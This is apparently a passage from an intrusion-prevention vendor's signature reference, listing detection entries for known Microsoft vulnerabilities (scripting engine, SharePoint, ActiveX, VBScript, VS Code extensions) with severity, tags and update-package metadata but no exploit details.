File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8371

About this situation: An attempt to exploit a vulnerability in Microsoft scripting engine detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 11.0, MS2018-08, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1092-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8371
Description:
Back to top

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8372

About this situation: An attempt to exploit a vulnerability in Microsoft scripting engine detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 11.0, Microsoft Edge, MS2018-08, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1092-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8372
Description:
Back to top

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8384

About this situation: An attempt to exploit a vulnerability in Microsoft scripting engine detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2018-08, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1092-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8384
Description:
Back to top

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8387

About this situation: An attempt to exploit a vulnerability in Microsoft scripting engine detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2018-08, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1092-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8387
Description:
Back to top

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8389

About this situation: An attempt to exploit a vulnerability in Microsoft scripting engine detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 11.0, MS2018-08, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1092-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8389
Description:
Back to top

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8403

About this situation: An attempt to exploit a vulnerability in Microsoft scripting engine detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 11.0, Microsoft Edge, MS2018-08, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1092-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8403
Description:
Back to top

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8542

About this situation: An attempt to exploit a vulnerability in Chakra scripting engine detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2018-11, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1115-5242
Last changed: sgpkg-ips-1115-5242
Vulnerability: Chakra-Scripting-Engine-Memory-Corruption-CVE-2018-8542
Description:
Back to top

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2024-38178

About this situation: An attempt to exploit a vulnerability in Microsoft Scripting Engine detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2024-08, CVE2024, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1763-5242
Last changed: sgpkg-ips-1763-5242
Vulnerability: Microsoft-Scripting-Engine-Memory-Corruption-CVE-2024-38178
Description:
Back to top

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1001

About this situation: An attempt to exploit a vulnerability in Microsoft Windows
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2019, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1175-5242
Last changed: sgpkg-ips-1175-5242
Vulnerability: Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1001
Description:
Back to top

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1004

About this situation: An attempt to exploit a vulnerability in Microsoft Windows
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2019, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1175-5242
Last changed: sgpkg-ips-1175-5242
Vulnerability: Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1004
Description:
Back to top

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1062

About this situation: An attempt to exploit a vulnerability in Microsoft Windows
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2019, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1175-5242
Last changed: sgpkg-ips-1175-5242
Vulnerability: Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1062
Description:
Back to top

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1063

About this situation: An attempt to exploit a vulnerability in Microsoft Windows
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2019, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1175-5242
Last changed: sgpkg-ips-1176-5242
Vulnerability: Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1063
Description:
Back to top

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1092

About this situation: An attempt to exploit a vulnerability in Microsoft Windows
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2019, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1175-5242
Last changed: sgpkg-ips-1175-5242
Vulnerability: Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1092
Description:
Back to top

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1103

About this situation: An attempt to exploit a vulnerability in Microsoft Windows
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2019, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1175-5242
Last changed: sgpkg-ips-1176-5242
Vulnerability: Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1103
Description:
Back to top

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1104

About this situation: An attempt to exploit a vulnerability in Microsoft Windows
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2019, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1175-5242
Last changed: sgpkg-ips-1175-5242
Vulnerability: Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1104
Description:
Back to top

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1106

About this situation: An attempt to exploit a vulnerability in Microsoft Windows
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2019, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1175-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1106
Description:
Back to top

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1107

About this situation: An attempt to exploit a vulnerability in Microsoft Windows
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2019, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1175-5242
Last changed: sgpkg-ips-1175-5242
Vulnerability: Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1107
Description:
Back to top

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2020-17052

About this situation: An attempt to exploit a vulnerability in Microsoft Scripting Engine detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 11.0, Microsoft Edge, MS2020-11, CVE2020, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1295-5242
Last changed: sgpkg-ips-1295-5242
Vulnerability: Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2020-17052
Description:
Back to top

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2021-34480

About this situation: An attempt to exploit a vulnerability in Microsoft Scripting Engine detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, Microsoft Edge, MS2021-08, CVE2021, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1376-5242
Last changed: sgpkg-ips-1376-5242
Vulnerability: Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2021-34480
Description:
Back to top

File-Text_Microsoft-Scripting-Runtime-Object-Library-Use-After-Free-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Text File Stream
Severity: 7
Tags: Windows 2003, Windows XP SP2, Windows Vista, Windows 7, Windows 2008 R2, Windows 8, Windows RT, Windows 2012, Windows 2008, Any Hardware, MS2013-12, CVE2013, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-555-5211
Last changed: sgpkg-ips-555-5211
Vulnerability: Microsoft-Scripting-Runtime-Object-Library-Use-After-Free-Vulnerability
Description:
Back to top

File-Text_Microsoft-Scriptlet-ActiveX-Component-Usage

About this situation: Reference to Microsoft Scriptlet ActiveX component detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2010-10, CVE2010, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-410-4219
Vulnerability: Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-3331
Description:
Back to top

File-Text_Microsoft-Sharepoint-Remote-File-Disclosure-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Sharepoint, MS2011-09, CVE2011, Windows not specific, Microsoft Sharepoint not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-412-4219
Last changed: sgpkg-ips-412-4219
Vulnerability: Microsoft-Sharepoint-Remote-File-Disclosure-Vulnerability
Description:
Back to top

File-Text_Microsoft-Sharepoint-Server-Remote-Code-Execution-CVE-2021-26420

About this situation: An attempt to exploit a vulnerability in Microsoft Sharepoint detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Sharepoint, CVE2021, Windows not specific, Microsoft Sharepoint not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1835-5242
Last changed: sgpkg-ips-1835-5242
Vulnerability: Microsoft-Sharepoint-Server-Remote-Code-Execution-CVE-2021-26420
Description:
Back to top

File-Text_Microsoft-Sharepoint-Server-Remote-Code-Execution-CVE-2025-21400

About this situation: An attempt to exploit a vulnerability in Microsoft Sharepoint detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Sharepoint, MS2025-02, CVE2025, Windows not specific, Microsoft Sharepoint not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1835-5242
Last changed: sgpkg-ips-1864-5242
Vulnerability: Microsoft-Sharepoint-Server-Remote-Code-Execution-CVE-2025-21400
Description:
Back to top

File-Text_Microsoft-Sharepoint-Server-Remote-Code-Execution-CVE-2025-29794

About this situation: An attempt to exploit a vulnerability in Microsoft Sharepoint detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Sharepoint, MS2025-04, CVE2025, Windows not specific, Microsoft Sharepoint not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1864-5242
Last changed: sgpkg-ips-1864-5242
Vulnerability: Microsoft-Sharepoint-Server-Remote-Code-Execution-CVE-2025-29794
Description:
Back to top

File-Text_Microsoft-Sharepoint-Username-Sanitization-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Microsoft Office SharePoint Server detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office SharePoint Server 2010, MS2012-07, CVE2012, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-463-5211
Last changed: sgpkg-ips-463-5211
Vulnerability: Microsoft-Sharepoint-Username-Sanitization-Cross-Site-Scripting
Description:
Back to top

File-Text_Microsoft-Sharepoint-Workflow-Isgoodworkflowcore-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Microsoft SharePoint Enterprise Server detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Sharepoint, MS2022-09, CVE2022, Windows not specific, Microsoft Sharepoint not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1527-5242
Last changed: sgpkg-ips-1751-5242
Vulnerability: Microsoft-Sharepoint-Workflow-Isgoodworkflowcore-Insecure-Deserialization
Description:
Back to top

File-Text_Microsoft-Sharepoint-Workflow-Isgoodworkflowcore-Insecure-Deserialization-2

About this situation: An attempt to exploit a vulnerability in Microsoft SharePoint Enterprise Server detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Sharepoint, MS2022-10, CVE2022, Windows not specific, Microsoft Sharepoint not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1535-5242
Last changed: sgpkg-ips-1751-5242
Vulnerability: Microsoft-Sharepoint-Workflow-Isgoodworkflowcore-Insecure-Deserialization-2
Description:
Back to top

File-Text_Microsoft-Sharepoint-Workflow-Workflowcodetypereferenceexpression-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Microsoft Sharepoint Enterprise Server detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Sharepoint, CVE2022, Windows not specific, Microsoft Sharepoint not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1547-5242
Last changed: sgpkg-ips-1751-5242
Vulnerability: MS-Sharepoint-Workflowcodetypereferenceexpression-Insecure-Deserialization
Description:
Back to top

File-Text_Microsoft-Silverlight-Pointer-Handling-Memory-Corruption

About this situation: Microsoft Silverlight memory corruption
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Silverlight, MS2010-08, CVE2010, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Silverlight-Pointer-Handling-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-SQL-Server-Distributed-Management-Objects-Buffer-Overflow

About this situation: Attempt to exploit buffer overflow vulnerability in Microsoft SQL Server detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft SQL Server 2005, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-552-5211
Vulnerability: HTTP_Microsoft-SQL-Server-Distributed-Management-Objects-Buffer-Overflow
Description:
Back to top

File-Text_Microsoft-Tablet-Input-Band-Object-Handling-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2015-10, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-697-5211
Last changed: sgpkg-ips-697-5211
Vulnerability: Microsoft-Tablet-Input-Band-Object-Handling-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Text-To-Speech-CVE-2018-8634

About this situation: A vulnerability in Microsoft Text To Speech
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1119-5242
Vulnerability: Microsoft-Text-To-Speech-CVE-2018-8634
Description:
Back to top

File-Text_Microsoft-Time-Remote-Code-Execution-CVE-2011-3397

About this situation: Detected attempt to exploit a vulnerability in Microsoft Windows
Context: Text File Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008, Any Hardware, MS2011-12, CVE2011, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-428-4219
Last changed: sgpkg-ips-428-4219
Vulnerability: Microsoft-Time-Remote-Code-Execution-CVE-2011-3397
Description:
Back to top

File-Text_Microsoft-VBScript-RCE-CVE-2018-8174

About this situation: A potentially malicious script
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2018-05, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1065-5242
Last changed: sgpkg-ips-1241-5242
Vulnerability: Microsoft-VBScript-RCE-CVE-2018-8174
Description:
Back to top

File-Text_Microsoft-VBScript-RCE-CVE-2018-8174-2

About this situation: A public exploit against CVE-2018-8174 detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2018-05, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1087-5242
Last changed: sgpkg-ips-1202-5242
Vulnerability: Microsoft-VBScript-RCE-CVE-2018-8174
Description:
Back to top

File-Text_Microsoft-VBScript-Scripting-Engine-CVE-2014-6363

About this situation: An attempt to exploit a vulnerability in Microsoft VBScript scripting engine
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2014-12, CVE2014, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-620-5211
Last changed: sgpkg-ips-1776-5242
Vulnerability: Microsoft-VBScript-Scripting-Engine-CVE-2014-6363
Description:
Back to top

File-Text_Microsoft-Video-ActiveX-Control-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Video detected
Context: Text File Stream
Severity: 10
Tags: Windows XP, Windows 2003, Any Hardware, MS2009-07, MS2009-10, CVE2008, CVE2009, Windows XP not specific, Windows 2003 not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-579-5211
Vulnerability: Microsoft-Video-ActiveX-Control-Stack-Buffer-Overflow
Microsoft-Active-Template-Library-Remote-Code-Execution-MS09-060
Description:
Back to top

File-Text_Microsoft-Video-ActiveX-Control-Stack-Buffer-Overflow-MS09-037

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2009-08, CVE2008, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-448-4219
Vulnerability: Microsoft-Video-ActiveX-Control-Stack-Buffer-Overflow-MS09-037
Description:
Back to top

File-Text_Microsoft-Visual-Basic-Flexgrid-ActiveX-Control-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Visual Basic runtime detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Visual Basic, Microsoft Visual FoxPro, MS2008-12, CVE2008, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-552-5211
Vulnerability: Microsoft-Visual-Basic-Flexgrid-ActiveX-Control-Integer-Overflow
Description:
Back to top

File-Text_Microsoft-Visual-Basic-Flexgrid-ActiveX-Control-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Visual Basic runtime detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Project, Microsoft Visual Basic, Microsoft Visual FoxPro, Microsoft FrontPage, MS2008-12, CVE2008, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-552-5211
Vulnerability: Microsoft-Visual-Basic-Flexgrid-ActiveX-Control-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Visual-Foxpro-Fpole.ocx-ActiveX-Control-Buffer-Overflow

About this situation: Detected an access to the vulnerable ActiveX control
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2008-02, CVE2007, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: Microsoft-Visual-Foxpro-Fpole.ocx-ActiveX-Control-BOF
Description:
Back to top

File-Text_Microsoft-Visual-Foxpro-Vfp6r-Docmd-ActiveX-Control-Command-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Visual FoxPro detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Microsoft Visual Studio, Microsoft Visual FoxPro, CVE2008, Windows not specific, Microsoft Visual Studio not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: HTTP_Microsoft-Visual-Foxpro-Vfp6r.dll-Docmd-ActiveX-Control-Command-Execution
Description:
Back to top

File-Text_Microsoft-Visual-Studio-Code-Markdown-Preview-Enhanced-Extension-Command-Injection

About this situation: An attempt to exploit a vulnerability in Microsoft Visual Studio Code - Markdown Preview Enhanced Extension detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Visual Studio Code, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1549-5242
Last changed: sgpkg-ips-1549-5242
Vulnerability: Microsoft-VSCode-Markdown-Preview-Enhanced-Extension-Command-Injection
Description:
Back to top

File-Text_Microsoft-Visual-Studio-Code-Maven-For-Java-Extension-Command-Injection

About this situation: An attempt to exploit a vulnerability in Microsoft Visual Studio Code - Maven for Java detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Visual Studio Code, CVE2021, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1369-5242
Last changed: sgpkg-ips-1369-5242
Vulnerability: Microsoft-Visual-Studio-Code-Maven-For-Java-Extension-Command-Injection
Description:
Back to top

File-Text_Microsoft-Visual-Studio-Code-Maven-For-Java-Extension-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Visual Studio Code detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Visual Studio, CVE2021, Windows not specific, Microsoft Visual Studio not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1333-5242
Last changed: sgpkg-ips-1333-5242
Vulnerability: Microsoft-Visual-Studio-Code-Maven-For-Java-Extension-Remote-Code-Execution
Description:
Back to top

File-Text_Microsoft-Visual-Studio-Code-Remote-Containers-Extension-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Visual Studio Code Remote - Containers Extension detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Visual Studio Code, CVE2021, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1334-5242
Last changed: sgpkg-ips-1334-5242
Vulnerability: Microsoft-Visual-Studio-Code-Remote-Containers-Extension-Remote-Code-Execution
Description:
Back to top

File-Text_Microsoft-Visual-Studio-MSMASK32.OCX-ActiveX-Control-BOF

About this situation: Attempt to exploit a buffer overflow vulnerability in Microsoft Visual Studio detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Microsoft Visual Studio, MS2008-12, CVE2008, Windows not specific, Microsoft Visual Studio not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-551-5211
Vulnerability: Microsoft-Visual-Studio-MSMASK32.OCX-ActiveX-Control-BOF
Description:
Back to top

File-Text_Microsoft-Visual-Studio-PDWizard.ocx-ActiveX-Control-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Visual Basic and Visual Studio detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Visual Studio, Microsoft Visual Basic, CVE2007, Windows not specific, Microsoft Visual Studio not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-551-5211
Vulnerability: Microsoft-Visual-Studio-PDWizard.ocx-ActiveX-Control-Code-Execution
Description:
Back to top

File-Text_Microsoft-Visual-Studio-PDWizard.ocx-ActiveX-Control-Memory-Corruption

About this situation: Detected an access to the vulnerable ActiveX control
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Visual Studio, Microsoft Visual Basic, MS2007-08, CVE2007, Windows not specific, Microsoft Visual Studio not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: Microsoft-Visual-Studio-PDWizard.ocx-ActiveX-Control-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Visual-Studio-WMI-Object-Broker-ActiveX-Control-Usage

About this situation: Detects WMI Object Broker ActiveX Control usage that can be considered suspicious
Context: Text File Stream
Severity: 10
Tags: Windows, x86, Microsoft Visual Studio 2005, MS2006-12, CVE2006, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: HTTP-Microsoft-Visual-Studio-WMI-Object-Broker-ActiveX-Code-Execution
Description:
Back to top

File-Text_Microsoft-VM-ActiveX-Component-Vulnerability

About this situation: An attempted access to a Microsoft VM ActiveX control detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft VM, MS2000, CVE2000, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-VM-ActiveX-Component-Vulnerability
Description:
Back to top

File-Text_Microsoft-Windows-ActiveX-Control-hxvz.dll-Memory-Corruption

About this situation: An attempt to exploit a memory corruption vulnerability in Microsoft Windows ActiveX Control hxvz.dll detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Help, MS2008-04, CVE2008, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: HTTP-Microsoft-Windows-ActiveX-Control-hxvz.dll-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Windows-ActiveX-Data-Objects-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, ActiveX, CVE2019, Windows not specific, ActiveX not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1176-5242
Last changed: sgpkg-ips-1272-5242
Vulnerability: Microsoft-Windows-ActiveX-Data-Objects-Code-Execution
Description:
Back to top

File-Text_Microsoft-Windows-ADO-Record-Memory-CVE-2011-0027

About this situation: Detected attempt to exploit a vulnerability in Microsoft Windows
Context: Text File Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008, Any Hardware, MS2011-01, CVE2011, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Windows-ADO-Record-Memory-CVE-2011-0027
Description:
Back to top

File-Text_Microsoft-Windows-Animation-Manager-CVE-2016-7205-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2016-11, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-824-5242
Last changed: sgpkg-ips-824-5242
Vulnerability: Microsoft-Windows-Animation-Manager-CVE-2016-7205-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Windows-DirectX-Information-Disclosure-CVE-2018-8563

About this situation: An attempt to exploit a vulnerability in Microsoft Graphics Component detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 11.0, MS2018-11, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1115-5242
Last changed: sgpkg-ips-1115-5242
Vulnerability: Microsoft-Windows-DirectX-Information-Disclosure-CVE-2018-8563
Description:
Back to top

File-Text_Microsoft-Windows-File-Explorer-Command-File-NTLM-Relay-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1782-5242
